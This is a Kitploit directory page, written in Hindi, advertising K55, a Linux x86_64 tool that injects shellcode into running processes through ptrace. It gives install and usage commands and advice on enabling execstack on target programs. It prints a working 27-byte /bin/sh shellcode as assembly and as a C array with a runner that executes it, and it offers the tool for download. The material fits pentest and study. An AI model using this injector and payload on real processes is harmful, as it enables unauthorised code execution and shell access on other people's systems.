Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
K55 — Linux x86_64 प्रक्रिया इंजेक्शन उपयोगिता | Kitploit
उपकरण/GitHubGitHub/josh0xa/k55
शोषणशेलकोडरेड टीमिंग
GitHubjosh0xa/k55

K55

Linux x86_64 प्रक्रिया इंजेक्शन उपयोगिता

रिपॉजिटरी देखें
59135 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

K55 - Linux x86_64 प्रक्रिया इंजेक्शन यूटिलिटी (C++14)

lisence

K55 के बारे में

(उच्चारण: "kay fifty-five")
K55 पेलोड इंजेक्शन टूल का उपयोग x86_64 शेलकोड पेलोड को चल रही प्रक्रियाओं में इंजेक्ट करने के लिए किया जाता है। यह उपयोगिता आधुनिक C++11 तकनीकों के साथ-साथ कुछ पारंपरिक C लिनक्स फ़ंक्शन जैसे ptrace() का उपयोग करके विकसित की गई है। लक्ष्य प्रक्रिया में उत्पन्न शेलकोड 27 बाइट्स का है और यह लक्ष्य के एड्रेस स्पेस के भीतर /bin/sh (एक बैश शेल उत्पन्न करता है) को निष्पादित करता है। भविष्य में, मैं उपयोगकर्ताओं को कमांड लाइन आर्गुमेंट्स के माध्यम से अपना स्वयं का शेलकोड इनपुट करने की अनुमति दूंगा।

इंस्टॉलेशन

  1. git clone https://github.com/josh0xA/K55.git
  2. cd K55
  3. chmod +x build-install.sh
  4. ./build-install.sh

K55 उपयोग

Usage: ./K55 <process-name>

  • process-name कोई भी लिनक्स प्रक्रिया हो सकती है जिसके पास r-xp या execstack अनुमतियाँ हों।

परीक्षण

परीक्षण 1) एक टर्मिनल (K55/ निर्देशिका) में, चलाएँ: ./k55_example_process/k55_test_process
परीक्षण 2) दूसरे टर्मिनल में, इंजेक्टर चलाएँ: sudo ./K55 k55_test_process

K55 प्रभाव में

  • जब K55 शेलकोड इंजेक्टर चलाया जाता है (रूट के रूप में), तो k55_test_process में एक शेल उत्पन्न होता है।

दी गई प्रक्रिया में इंजेक्ट करना

लक्ष्य में उत्पन्न शेल

सीमाएँ

स्पष्ट रूप से, ptrace(PTRACE_POKETEXT...) कॉल्स सबसे अधिक छिपी हुई नहीं हैं। इसलिए, कुछ अनुप्रयोग K55 के प्रभाव को सीमित कर सकते हैं। हालांकि, सुरक्षा परीक्षण के लिए, सुनिश्चित करें कि आप अपने लक्ष्य अनुप्रयोगों के लिए execstack चालू करें। उदाहरण के लिए, यदि मैं gdb पर परीक्षण कर रहा हूँ, इंजेक्ट करने से पहले, मैं निम्नलिखित चलाऊंगा: sudo execstack -s /usr/bin/gdb। अपने वितरण के पैकेज मैनेजर से execstack स्थापित करें। आर्क लिनक्स उपयोगकर्ताओं के लिए, आप execstack को AUR पर पा सकते हैं।

शेल पेलोड तैयार करना

नोट: निम्नलिखित एक प्रदर्शन है। पेलोड स्ट्रिंग पहले से K55 में हार्डकोड की गई है।

पेलोड का असेंबली कार्यान्वयन (shell-storm से उद्धृत (रीडायरेक्ट))

root@kitploit:~
main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall

पेलोड का C-कार्यान्वयन

root@kitploit:~
#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

संदर्भ

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

लाइसेंस

MIT लाइसेंस
Copyright (c) Josh Schiavone

टूल डाउनलोड करें